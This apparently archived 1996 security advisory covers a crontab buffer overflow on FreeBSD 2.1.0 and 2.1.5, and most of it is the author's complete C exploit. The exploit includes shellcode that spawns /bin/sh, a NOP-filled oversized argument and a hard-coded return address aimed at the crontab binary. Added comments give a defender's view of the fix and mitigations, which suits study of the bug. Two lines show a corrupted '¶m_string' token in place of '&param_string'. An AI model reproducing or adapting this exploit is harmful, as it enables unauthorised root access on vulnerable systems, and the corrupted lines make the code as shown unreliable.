COMMAND

    crontab

SYSTEMS AFFECTED

    FreeBSD 2.1.0, 2.1.5

PROBLEM

/* ---------------------------- CUT HERE ----------------------------------- */
/*                                                                           */
/*                                 Hi !                                      */
/*      This is buffer overflow exploit for crontab bug (FreeBSD 2.1.0).     */
/*           If you have any problems with it, drop me a letter.             */
/*                              Have fun !                                   */
/*                                                                           */
/*                                                                           */
/*                         ----------------------                            */
/*             ---------------------------------------------                 */
/*  -----------------   Dedicated to my beautiful lady   ------------------  */
/*             ---------------------------------------------                 */
/*                         ----------------------                            */
/*                                                                           */
/*         Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su        */

#include <stdio.h>
main()
{
/* Historical proof-of-concept from a 1996 advisory for a buffer overflow
 * in crontab on the FreeBSD releases listed above; kept as a record of
 * the bug, not as maintained code (the implicit-int main() and the
 * undeclared string/exec prototypes are 1996 conventions).
 * Defender's view: the only input handed to crontab is a single oversized
 * command-line argument (see the execle call at the bottom), so the
 * overflow is presumably in argv handling — the fix class is bounds-checked
 * copying in the target; a non-executable stack, stack canaries and address
 * randomisation each break the hard-coded-address assumption made below. */
#define length 353                   /* total size of the argument buffer */
  int i,j;                           /* j is declared but never used */
  unsigned long start_addr;          /* fixed address written into the argument twice */
  char *env[]={NULL};                /* crontab is started with an empty environment */
  char param_string[length];         /* the single argv[1] handed to crontab */
  char code_string[]=                /* byte string spliced into param_string below */
                      {
                        "\xeb\x2a"                         /* jmp    cont               */

/* geteip: */           "\x5d"                             /* popl   %ebp               */
                        "\x55"                             /* pushl  %ebp               */
                        "\xfe\x4d\xe7"                     /* decb   0xffffffe7(%ebp)   */
                        "\xfe\x4d\xeb"                     /* decb   0xffffffeb(%ebp)   */
                        "\xfe\x4d\xec"                     /* decb   0xffffffec(%ebp)   */
                        "\xfe\x4d\xed"                     /* decb   0xffffffed(%ebp)   */
                        "\xff\x45\xef"                     /* incl   0xffffffef(%ebp)   */
                        "\xfe\x4d\xf4"                     /* decb   0xfffffff4(%ebp)   */
                        "\xc3"                             /* ret                       */

/* 0xffffffe0(%ebp): */ "/bin/sh"
/* 0xffffffe7(%ebp): */ "\x01"

/* execve:           */ "\x8d\x05\x3b\x01\x01\x01"         /* leal   0x3b,%eax          */
                        "\x9a\xff\xff\xff\xff\x07\x01"     /* lcall  0x7,0x0            */

/* cont:  */            "\xc7\xc4XXXX"                     /* movl   $0xXXXXXXXX,%esp   */
                        "\xe8\xcb\xff\xff\xff"             /* call   geteip             */
                        "\x81\xc5\xef\xff\xff\xff"         /* addl   $0xffffffef,%ebp   */
                        "\x55"                             /* pushl  %ebp               */
                        "\x55"                             /* pushl  %ebp               */
                        "\x81\xc5\xf1\xff\xff\xff"         /* addl   $0xfffffff1,%ebp   */
                        "\x55"                             /* pushl  %ebp               */
                        "\xe8\xd4\xff\xff\xff"             /* call   execve             */
                     };

  /* Fill the whole argument with 0x90 bytes, then NUL-terminate it. */
  for(i=0;i<length-1;param_string[i++]='\x90'); param_string[length-1]='\0';
  /* Release-specific constant; nothing here derives it at run time. */
  start_addr=0xefbfddf0;
  /* Patch the "XXXX" placeholder in the movl above with start_addr. */
  *( (unsigned long*) strstr(code_string,"XXXX") )= start_addr;
  /* Splice code_string into the argument at offset 200; strlen() as the
   * count means no terminator is copied, so the 0x90 filler continues. */
  strncpy(¶m_string[200],code_string,strlen(code_string));
  /* Overwrite the four bytes at offset 348 with start_addr as well. */
  *( (unsigned long*) ¶m_string[348])= start_addr;

  /* Replace this process with crontab, passing param_string as its only
   * argument.  execle() returns only on failure, and that case is not
   * checked: main() then simply falls off the end. */
  execle("/usr/bin/crontab","/usr/bin/crontab",param_string,NULL,env,NULL);

}
/* ---------------------------- CUT HERE ----------------------------------- */